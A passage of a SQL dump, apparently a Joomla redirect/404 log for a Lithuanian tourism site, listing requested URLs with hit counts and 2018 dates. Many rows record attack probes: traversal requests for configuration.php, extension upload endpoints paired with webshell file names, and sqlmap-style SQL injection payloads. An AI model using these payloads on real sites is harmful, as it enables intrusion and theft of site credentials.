00:00:00'),(2179,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','','',2,0,'2018-03-28 17:58:02','0000-00-00 00:00:00'),(2180,'http://infotytuvenai.lt/index.php/lt//error.php','','','',4,0,'2018-03-28 17:58:06','0000-00-00 00:00:00'),(2181,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../izoc.php','','','',2,0,'2018-03-28 17:58:10','0000-00-00 00:00:00'),(2182,'http://infotytuvenai.lt/index.php/lt//components/com_b2jcontact/izoc.php','','','',2,0,'2018-03-28 17:58:15','0000-00-00 00:00:00'),(2183,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../izoc.php','','','',6,0,'2018-03-29 18:42:41','0000-00-00 00:00:00'),(2184,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../RxR_1522539990.php','','','',1,0,'2018-04-01 00:15:47','0000-00-00 00:00:00'),(2185,'http://infotytuvenai.lt/index.php/lt/?option=com_macgallery&view=download&albumid=../../configuration.php','','','',1349,0,'2018-04-01 00:17:28','0000-00-00 00:00:00'),(2186,'http://infotytuvenai.lt/index.php/lt/?option=com_jtagmembersdirectory&task=attachment&download_file=/../../../../configuration.php','','','',128,0,'2018-04-01 00:17:51','0000-00-00 00:00:00'),(2187,'http://infotytuvenai.lt/index.php/lt/?option=com_facegallery&task=imageDownload&img_name=../../configuration.php','','','',118,0,'2018-04-01 00:17:52','0000-00-00 00:00:00'),(2188,'http://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../izoc.php','','http://www.infotytuvenai.lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../izoc.php','',1,0,'2018-04-01 20:17:37','0000-00-00 00:00:00'),(2189,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../me.php','','','',3,0,'2018-04-02 23:06:34','0000-00-00 00:00:00'),(2190,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/','','','',1,0,'2018-04-04 09:25:01','0000-00-00 00:00:00'),(2191,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/','','','',1,0,'2018-04-04 09:43:11','0000-00-00 00:00:00'),(2192,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/programos','','','',219,0,'2018-04-05 20:19:05','0000-00-00 00:00:00'),(2193,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos','','','',179,0,'2018-04-05 22:07:38','0000-00-00 00:00:00'),(2194,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/kontaktai','','','',164,0,'2018-04-06 04:24:06','0000-00-00 00:00:00'),(2195,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/programos','','','',395,0,'2018-04-06 06:38:26','0000-00-00 00:00:00'),(2196,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/kontaktai','','','',79,0,'2018-04-07 16:14:18','0000-00-00 00:00:00'),(2197,'http://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','','http://www.infotytuvenai.lt/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','',22,0,'2018-04-07 18:15:22','0000-00-00 00:00:00'),(2198,'http://infotytuvenai.lt/index.php/lt/?option=com_cckjseblod&task=download&file=configuration.php','','','',1389,0,'2018-04-08 09:30:47','0000-00-00 00:00:00'),(2199,'http://infotytuvenai.lt/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',1028,0,'2018-04-08 09:30:48','0000-00-00 00:00:00'),(2200,'http://infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',3370,0,'2018-04-08 09:31:02','0000-00-00 00:00:00'),(2201,'http://infotytuvenai.lt/index.php/lt//XxX.php','','','',2,0,'2018-04-08 20:55:52','0000-00-00 00:00:00'),(2202,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form\"','','','',2,0,'2018-04-08 20:55:53','0000-00-00 00:00:00'),(2203,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',4,0,'2018-04-08 20:56:02','0000-00-00 00:00:00'),(2204,'http://infotytuvenai.lt/index.php/lt//images/jdownloads/screenshots/bot.php3.g','','','',2,0,'2018-04-08 20:56:03','0000-00-00 00:00:00'),(2205,'http://infotytuvenai.lt/index.php/lt//components/com_jbcatalog/libraries/jsupload/server/php/','','','',2,0,'2018-04-08 20:56:04','0000-00-00 00:00:00'),(2206,'http://infotytuvenai.lt/index.php/lt//components/com_jbcatalog/libraries/jsupload/server/php/files/RxR__pxmkl.php','','','',1,0,'2018-04-08 20:56:05','0000-00-00 00:00:00'),(2207,'http://infotytuvenai.lt/index.php/lt//modules/mod_socialpinboard_menu/saveimagefromupload.php','','','',2,0,'2018-04-08 20:56:07','0000-00-00 00:00:00'),(2208,'http://infotytuvenai.lt/index.php/lt//modules/mod_socialpinboard_menu/images/socialpinboard/temp/RxR__pxmkl.php','','','',1,0,'2018-04-08 20:56:08','0000-00-00 00:00:00'),(2209,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',5,0,'2018-04-08 20:56:10','0000-00-00 00:00:00'),(2210,'http://infotytuvenai.lt/index.php/lt//tmp/plupload/RxR.php','','','',2,0,'2018-04-08 20:56:11','0000-00-00 00:00:00'),(2211,'http://infotytuvenai.lt/index.php/lt//com_sexycontactform/fileupload/index.php','','','',2,0,'2018-04-08 20:56:12','0000-00-00 00:00:00'),(2212,'http://infotytuvenai.lt/index.php/lt//com_sexycontactform/fileupload/files/RxR__pxmkl.php','','','',1,0,'2018-04-08 20:56:13','0000-00-00 00:00:00'),(2213,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_myblog&task=ajaxupload','','','',2,0,'2018-04-08 20:56:14','0000-00-00 00:00:00'),(2214,'http://infotytuvenai.lt/index.php/lt//xx.php.xxxjpg','','','',2,0,'2018-04-08 20:56:17','0000-00-00 00:00:00'),(2215,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_rokdownloads/assets/uploadhandler.php','','','',2,0,'2018-04-08 20:56:19','0000-00-00 00:00:00'),(2216,'http://infotytuvenai.lt/index.php/lt//images/stories/xx.php.xxxjpg','','','',4,0,'2018-04-08 20:56:20','0000-00-00 00:00:00'),(2217,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_extplorer/uploadhandler.php','','','',2,0,'2018-04-08 20:56:21','0000-00-00 00:00:00'),(2218,'http://infotytuvenai.lt/index.php/lt//modules/mod_simplefileuploadv1.3/elements/udd.php','','','',2,0,'2018-04-08 20:56:24','0000-00-00 00:00:00'),(2219,'http://infotytuvenai.lt/index.php/lt//modules/mod_simplefileuploadv1.3/elements/RxR__pxmkl.php','','','',1,0,'2018-04-08 20:56:25','0000-00-00 00:00:00'),(2220,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',2,0,'2018-04-08 20:56:28','0000-00-00 00:00:00'),(2221,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_bt_portfolio/RxR__pxmkl.php','','','',1,0,'2018-04-08 20:56:29','0000-00-00 00:00:00'),(2222,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_jwallpapers&task=upload','','','',3,0,'2018-04-08 20:56:30','0000-00-00 00:00:00'),(2223,'http://infotytuvenai.lt/index.php/lt//jwallpapers_files/plupload/RxR__pxmkl.php','','','',1,0,'2018-04-08 20:56:31','0000-00-00 00:00:00'),(2224,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=izo.php','','','',2,0,'2018-04-08 20:56:32','0000-00-00 00:00:00'),(2225,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_redmystic/chart/tmp-upload-images/izo.php','','','',2,0,'2018-04-08 20:56:33','0000-00-00 00:00:00'),(2226,'http://infotytuvenai.lt/index.php/lt//components/com_facileforms/libraries/jquery/RxR__pxmkl.php','','','',1,0,'2018-04-08 20:56:36','0000-00-00 00:00:00'),(2227,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=izoc.php','','','',2,0,'2018-04-08 20:56:38','0000-00-00 00:00:00'),(2228,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/izoc.php','','','',2,0,'2018-04-08 20:56:39','0000-00-00 00:00:00'),(2229,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=izoc.php','','','',2,0,'2018-04-08 20:56:40','0000-00-00 00:00:00'),(2230,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_acymailing/inc/openflash/tmp-upload-images/izoc.php','','','',2,0,'2018-04-08 20:56:41','0000-00-00 00:00:00'),(2231,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=izoc.php','','','',2,0,'2018-04-08 20:56:42','0000-00-00 00:00:00'),(2232,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/izoc.php','','','',2,0,'2018-04-08 20:56:45','0000-00-00 00:00:00'),(2233,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=izoc.php','','','',2,0,'2018-04-08 20:56:45','0000-00-00 00:00:00'),(2234,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_jinc/classes/graphics/tmp-upload-images/izoc.php','','','',2,0,'2018-04-08 20:56:46','0000-00-00 00:00:00'),(2235,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=izoc.php','','','',2,0,'2018-04-08 20:56:47','0000-00-00 00:00:00'),(2236,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/izoc.php','','','',2,0,'2018-04-08 20:56:48','0000-00-00 00:00:00'),(2237,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=izoc.php','','','',2,0,'2018-04-08 20:56:51','0000-00-00 00:00:00'),(2238,'http://infotytuvenai.lt/index.php/lt//administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/izoc.php','','','',2,0,'2018-04-08 20:56:52','0000-00-00 00:00:00'),(2239,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos','','','',87,0,'2018-04-10 11:02:11','0000-00-00 00:00:00'),(2240,'http://infotytuvenai.lt/index.php/lt/component/vitabook?new=true','','http://infotytuvenai.lt/index.php/lt/component/vitabook?new=true','',2,0,'2018-04-10 13:49:01','0000-00-00 00:00:00'),(2241,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/galerija','','','',170,0,'2018-04-10 17:30:32','0000-00-00 00:00:00'),(2242,'http://infotytuvenai.lt/index.php/lt/?option=com_jambook&task=add','','http://infotytuvenai.lt/index.php/lt/?option=com_jambook&task=add','',2,0,'2018-04-11 04:46:11','0000-00-00 00:00:00'),(2243,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_community&view=frontpage','','','',2,0,'2018-04-11 19:18:53','0000-00-00 00:00:00'),(2244,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/galerija','','','',200,0,'2018-04-11 21:14:56','0000-00-00 00:00:00'),(2245,'http://infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form\"','','','',103,0,'2018-04-13 03:36:03','0000-00-00 00:00:00'),(2246,'http://infotytuvenai.lt/index.php?option=com_jwallpapers&task=upload','','','',11,0,'2018-04-13 03:36:28','0000-00-00 00:00:00'),(2247,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/video-apie-kelmes-krasta','','','',21,0,'2018-04-15 00:03:05','0000-00-00 00:00:00'),(2248,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/tytuvenu-festivalis','','','',21,0,'2018-04-15 00:03:30','0000-00-00 00:00:00'),(2249,'http://www.infotytuvenai.lt/index.php/lt/?option=com_cckjseblod&task=download&file=configuration.php','','','',52,0,'2018-04-15 20:17:29','0000-00-00 00:00:00'),(2250,'http://www.infotytuvenai.lt/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',23,0,'2018-04-15 20:17:29','0000-00-00 00:00:00'),(2251,'http://www.infotytuvenai.lt/index.php/lt/?option=com_joomanager&controller=details&task=download&path=configuration.php','','','',49,0,'2018-04-15 20:17:31','0000-00-00 00:00:00'),(2252,'http://www.infotytuvenai.lt/index.php/lt/?option=com_macgallery&view=download&albumid=../../configuration.php','','','',50,0,'2018-04-15 20:17:32','0000-00-00 00:00:00'),(2253,'http://www.infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',77,0,'2018-04-15 20:17:32','0000-00-00 00:00:00'),(2254,'http://infotytuvenai.lt/index.php/lt/?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1','','','',219,0,'2018-04-20 03:26:35','0000-00-00 00:00:00'),(2255,'http://infotytuvenai.lt/index.php/lt/?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&Itemid=0','','','',120,0,'2018-04-20 03:26:51','0000-00-00 00:00:00'),(2256,'http://www.infotytuvenai.lt/index.php/lt/?option=1463&view=article&id=306','','','',1,0,'2018-04-26 09:45:06','0000-00-00 00:00:00'),(2257,'http://www.infotytuvenai.lt/index.php/lt/?option=1773&view=article&id=306','','','',1,0,'2018-04-26 09:45:06','0000-00-00 00:00:00'),(2258,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content,(,.(\'\".),&view=article&id=306','','','',1,0,'2018-04-26 09:45:06','0000-00-00 00:00:00'),(2259,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\'gfHQLi<\'\">QfXWZz&view=article&id=306','','','',1,0,'2018-04-26 09:45:07','0000-00-00 00:00:00'),(2260,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 3086=3535 AND (6001=6001&view=article&id=306','','','',1,0,'2018-04-26 09:45:07','0000-00-00 00:00:00'),(2261,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 4376=4376 AND (1468=1468&view=article&id=306','','','',1,0,'2018-04-26 09:45:07','0000-00-00 00:00:00'),(2262,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 2508=3004&view=article&id=306','','','',1,0,'2018-04-26 09:45:07','0000-00-00 00:00:00'),(2263,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 4376=4376&view=article&id=306','','','',1,0,'2018-04-26 09:45:07','0000-00-00 00:00:00'),(2264,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 9480=8882 AND (\'jJBz\'=\'jJBz&view=article&id=306','','','',1,0,'2018-04-26 09:45:08','0000-00-00 00:00:00'),(2265,'http://www.infotytuvenai.lt/index.php/lt/?option=2190&view=article&id=306','','','',1,0,'2018-04-26 09:45:17','0000-00-00 00:00:00'),(2266,'http://www.infotytuvenai.lt/index.php/lt/?option=7497&view=article&id=306','','','',1,0,'2018-04-26 09:45:17','0000-00-00 00:00:00'),(2267,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content.)(,)(((\'\"&view=article&id=306','','','',1,0,'2018-04-26 09:45:17','0000-00-00 00:00:00'),(2268,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\'eaEZUS<\'\">GCmtDz&view=article&id=306','','','',1,0,'2018-04-26 09:45:18','0000-00-00 00:00:00'),(2269,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 4811=3608 AND (8271=8271&view=article&id=306','','','',1,0,'2018-04-26 09:45:18','0000-00-00 00:00:00'),(2270,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content) AND 9379=9379 AND (5628=5628&view=article&id=306','','','',1,0,'2018-04-26 09:45:19','0000-00-00 00:00:00'),(2271,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 5397=1596&view=article&id=306','','','',1,0,'2018-04-26 09:45:19','0000-00-00 00:00:00'),(2272,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 9379=9379&view=article&id=306','','','',1,0,'2018-04-26 09:45:19','0000-00-00 00:00:00'),(2273,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 9500=1024 AND (\'RYgn\'=\'RYgn&view=article&id=306','','','',1,0,'2018-04-26 09:45:20','0000-00-00 00:00:00'),(2274,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\') AND 9379=9379 AND (\'NHbj\'=\'NHbj&view=article&id=306','','','',1,0,'2018-04-26 09:45:20','0000-00-00 00:00:00'),(2275,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 3116=1432 AND \'xySP\'=\'xySP&view=article&id=306','','','',1,0,'2018-04-26 09:45:21','0000-00-00 00:00:00'),(2276,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content\' AND 9379=9379 AND \'mOnv\'=\'mOnv&view=article&id=306','','','',1,0,'2018-04-26 09:45:21','0000-00-00 00:00:00'),(2277,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 4891=5012 AND \'%\'=\'&view=article&id=306','','','',1,0,'2018-04-26 09:45:21','0000-00-00 00:00:00'),(2278,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content%\' AND 9379=9379 AND \'%\'=\'&view=article&id=306','','','',1,0,'2018-04-26 09:45:22','0000-00-00 00:00:00'),(2279,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 8316=4223-- mwlz&view=article&id=306','','','',1,0,'2018-04-26 09:45:22','0000-00-00 00:00:00'),(2280,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content AND 9379=9379-- kygt&view=article&id=306','','','',1,0,'2018-04-26 09:45:22','0000-00-00 00:00:00'),(2281,'http://www.infotytuvenai.lt/index.php/lt/?option=(SELECT (CASE WHEN (1279=3177) THEN 1279 ELSE 1279*(SELECT 1279 FROM INFORMATION_SCHEMA.PLUGINS) END))&view=article&id=306','','','',1,0,'2018-04-26 09:45:23','0000-00-00 00:00:00'),(2282,'http://www.infotytuvenai.lt/index.php/lt/?option=(SELECT (CASE WHEN (7086=7086) THEN 7086 ELSE 7086*(SELECT 7086 FROM INFORMATION_SCHEMA.PLUGINS) END))&view=article&id=306','','','',1,0,'2018-04-26 09:45:23','0000-00-00 00:00:00'),(2283,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=6282','','','',1,0,'2018-04-26 09:45:31','0000-00-00 00:00:00'),(2284,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=5658','','','',1,0,'2018-04-26 09:45:31','0000-00-00 00:00:00'),(2285,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CASE WHEN (5646=8084) THEN 5646 ELSE 5646*(SELECT 5646 FROM INFORMATION_SCHEMA.PLUGINS) END))','','','',1,0,'2018-04-26 09:45:41','0000-00-00 00:00:00'),(2286,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=(SELECT (CASE WHEN (6308=6308) THEN 6308 ELSE 6308*(SELECT 6308 FROM INFORMATION_SCHEMA.PLUGINS) END))','','','',1,0,'2018-04-26 09:45:41','0000-00-00 00:00:00'),(2287,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra','','','',8,0,'2018-05-10 08:02:47','0000-00-00 00:00:00'),(2288,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/ekskursijos','','','',8,0,'2018-05-10 08:02:48','0000-00-00 00:00:00'),(2289,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/paslaugos','','','',8,0,'2018-05-10 08:02:48','0000-00-00 00:00:00'),(2290,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/edukacines-programos','','','',4,0,'2018-05-10 10:01:29','0000-00-00 00:00:00'),(2291,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/suvenyrai','','','',3,0,'2018-05-10 10:01:29','0000-00-00 00:00:00'),(2292,'http://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/istatai','','','',3,0,'2018-05-10 10:01:30','0000-00-00 00:00:00'),(2293,'http://www.infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',3,0,'2018-05-19 11:22:53','0000-00-00 00:00:00'),(2294,'http://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1','','','',2,0,'2018-05-23 15:18:10','0000-00-00 00:00:00'),(2295,'http://www.infotytuvenai.lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',2,0,'2018-05-24 22:21:58','0000-00-00 00:00:00'),(2296,'http://www.infotytuvenai.lt//index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php','','','',2,0,'2018-05-24 22:22:01','0000-00-00 00:00:00'),(2297,'http://www.infotytuvenai.lt//index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php','','','',2,0,'2018-05-24 22:22:01','0000-00-00 00:00:00'),(2298,'http://infotytuvenai.lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',5,0,'2018-05-26 00:30:20','0000-00-00 00:00:00'),(2299,'http://infotytuvenai.lt//index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php','','','',3,0,'2018-05-26 00:30:23','0000-00-00 00:00:00'),(2300,'http://infotytuvenai.lt//index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php','','','',3,0,'2018-05-26 00:30:23','0000-00-00 00:00:00'),(2301,'http://www.infotytuvenai.lt/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php','','','',3,0,'2018-05-30 00:06:08','0000-00-00 00:00:00'),(2302,'http://www.infotytuvenai.lt/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php','','','',3,0,'2018-05-30 00:06:09','0000-00-00 00:00:00'),(2303,'http://www.infotytuvenai.lt/index.php/lt/index.php/kontakty','','','',5,0,'2018-05-30 00:06:12','0000-00-00 00:00:00'),(2304,'http://www.infotytuvenai.lt/index.php/lt/index.php/contato.html','','','',6,0,'2018-05-30 00:06:13','0000-00-00 00:00:00'),(2305,'http://www.infotytuvenai.lt/index.php?option=com_jwallpapers&task=upload','','','',3,0,'2018-05-30 00:06:20','0000-00-00 00:00:00'),(2306,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../me.php','','','',2,0,'2018-06-09 21:09:36','0000-00-00 00:00:00'),(2307,'http://www.infotytuvenai.lt/index.php/lt/contactus','','','',1,0,'2018-06-10 23:19:01','0000-00-00 00:00:00'),(2308,'http://www.infotytuvenai.lt/index.php/lt/kontakt','','','',1,0,'2018-06-10 23:19:03','0000-00-00 00:00:00'),(2309,'http://www.infotytuvenai.lt/index.php/lt/contacto','','','',1,0,'2018-06-10 23:19:04','0000-00-00 00:00:00'),(2310,'http://www.infotytuvenai.lt/index.php/lt/iletisim','','','',1,0,'2018-06-10 23:19:05','0000-00-00 00:00:00'),(2311,'http://www.infotytuvenai.lt/index.php/lt/contatti','','','',1,0,'2018-06-10 23:19:07','0000-00-00 00:00:00'),(2312,'http://www.infotytuvenai.lt/index.php/lt/contactar','','','',1,0,'2018-06-10 23:19:08','0000-00-00 00:00:00'),(2313,'http://www.infotytuvenai.lt/index.php/lt/contato','','','',1,0,'2018-06-10 23:19:09','0000-00-00 00:00:00'),(2314,'http://www.infotytuvenai.lt/index.php/lt/contactenos','','','',1,0,'2018-06-10 23:19:10','0000-00-00 00:00:00'),(2315,'http://www.infotytuvenai.lt/index.php/lt/contactos','','','',1,0,'2018-06-10 23:19:12','0000-00-00 00:00:00'),(2316,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-uz-2016-m','','http://www.infotytuvenai.lt/index.php/lt/','',145,0,'2018-06-12 11:45:36','0000-00-00 00:00:00'),(2317,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai','','http://www.infotytuvenai.lt/index.php/lt/','',299,0,'2018-06-12 11:49:32','0000-00-00 00:00:00'),(2318,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/kaimo-turizmas','','http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas','',386,0,'2018-06-12 13:27:11','0000-00-00 00:00:00'),(2319,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/gido-paslaugos','','http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis','',1,0,'2018-06-12 13:35:09','0000-00-00 00:00:00'),(2320,'http://www.infotytuvenai.lt/index.php/lt/pasiulymai','','http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/gido-paslaugos','',1,0,'2018-06-12 13:36:09','0000-00-00 00:00:00'),(2321,'http://www.infotytuvenai.lt/index.php/lt/apie-centra','','http://www.infotytuvenai.lt/index.php/lt/','',3,0,'2018-06-12 13:36:51','0000-00-00 00:00:00'),(2322,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/parama','','http://www.infotytuvenai.lt/index.php/lt/apie-centra/veiklos-strategija','',1,0,'2018-06-12 13:37:26','0000-00-00 00:00:00'),(2323,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/veiklos-ataskaitos','','http://www.infotytuvenai.lt/index.php/lt/apie-centra/galerija','',3,0,'2018-06-12 13:37:58','0000-00-00 00:00:00'),(2324,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/33-kava','','','',3,0,'2018-06-12 14:14:56','0000-00-00 00:00:00'),(2325,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=306','','http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas','',1,0,'2018-06-12 15:12:47','0000-00-00 00:00:00'),(2326,'http://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=305','','http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas','',1,0,'2018-06-12 15:12:58','0000-00-00 00:00:00'),(2327,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/32-dviraciai','','http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas','',2,0,'2018-06-12 15:13:11','0000-00-00 00:00:00'),(2328,'http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/muziejai','','http://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2018-06-12 15:16:16','0000-00-00 00:00:00'),(2329,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=306','','http://infotytuvenai.lt/index.php/lt/apgyvendinimas','',3,0,'2018-06-12 15:21:48','0000-00-00 00:00:00'),(2330,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=305','','http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=306','',7,0,'2018-06-12 15:22:13','0000-00-00 00:00:00'),(2331,'http://www.infotytuvenai.lt/index.php/lt/details-menu/24-college-of-engineering','','','',43,0,'2018-06-12 18:50:21','0000-00-00 00:00:00'),(2332,'http://www.infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/31-renginiai','','','',530,0,'2018-06-12 22:17:01','0000-00-00 00:00:00'),(2333,'http://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/319-baltas-vakaras-tytuvenuose','','','',1,0,'2018-06-13 11:15:00','0000-00-00 00:00:00'),(2334,'http://www.infotytuvenai.lt/index.php/lt/details-menu/26-college-of-general-studies','','','',47,0,'2018-06-13 11:46:54','0000-00-00 00:00:00'),(2335,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/index.php/lt/projektai/i-etapas-baznycios-restauravimas','','','',3,0,'2018-06-13 18:41:34','0000-00-00 00:00:00'),(2336,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/56-tytuvenu-festivalis/naujienos/243-blank','','','',34,0,'2018-06-14 09:09:46','0000-00-00 00:00:00'),(2337,'http://www.infotytuvenai.lt/index.php/lt/details-menu/25-college-of-fine-arts','','','',43,0,'2018-06-14 09:39:08','0000-00-00 00:00:00'),(2338,'http://www.infotytuvenai.lt/index.php/lt/details-menu/27-college-of-health-rehabilitation-sciences-sargent-college','','','',44,0,'2018-06-14 